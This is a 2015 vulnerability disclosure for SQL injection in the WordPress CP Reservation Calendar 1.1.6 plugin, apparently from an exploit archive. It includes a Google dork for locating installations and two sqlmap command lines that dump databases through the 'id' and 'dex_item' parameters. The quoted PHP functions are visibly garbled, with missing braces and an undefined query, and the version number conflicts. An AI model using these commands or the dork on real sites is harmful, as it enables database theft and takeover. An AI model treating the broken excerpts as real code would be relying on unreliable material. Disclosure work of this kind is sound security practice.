WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection

Related Vulnerabilities: CVE-2015-7235  
Publish Date: 15 Sep 2015

                # Exploit Title: WordPress: cp-reservation-calendar 1.1.6  SQLi injection]
# Date: 2015-09-15
# Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip
# Version: 1.1.6
# OWASP Top10: A1-Injection

A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6.
The vulnerability allows remote attackers to inject SQL commands.
The sql injection vulnerability is located in the `dex_reservations.php` file.
Remote attackers are able to execute own sql commands by manipulation of requested parameters. 

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

vulnerable function code...

function dex_reservations_calendar_load2() {
    global $wpdb;
	if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");

    //following line is vulnerable...

    $calid = str_replace  (TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]);
    $row_array = $wpdb->get_results($query,ARRAY_A);
    foreach ($row_array as $row)
        $d1 =  date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S])); 
        $d2 =  date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));

        echo $d1."-".$d2."\n";
        echo $row[TDE_RESERVATIONDATA_TITLE]."\n";
        echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";


The following URL executes vulnerable function:

POC using sqlmap tool::::

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1"
 -p id --level=5 --risk=3 --dbms="MySQL" --dbs


The following URL is too vulnerable


post parameters::::

An unauthenticated user can use the following URL to inject malicious SQL code.
[dex_item] on POST parameter is vulnerable

   vulnerable code 

is located in `dex_reservations.php`

function code..

function dex_reservations_get_option ($field, $default_value)
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if ($dex_option_buffered_id == CP_CALENDAR_ID)
        $value = $dex_option_buffered_item->$field;
       $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );
       $value = $myrows[0]->$field;
       $dex_option_buffered_item = $myrows[0];
       $dex_option_buffered_id  = CP_CALENDAR_ID;
    if ($value == '' && $dex_option_buffered_item->calendar_language == '')
        $value = $default_value;
    return $value;

When this function is called the defined CP_CALENDAR_ID must contains an integer but it isn't validating the parameter
POC using sqlmap tool::::

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1"
 -p dex_item --dbms="MySQL" --level=5 --risk=3


 2015-03-01: vulnerability found
 2015-03-09: reported to vendor
 2015-03-21-: released cp_reservation_calendar v1.1.7
 2015-09-15: full disclosure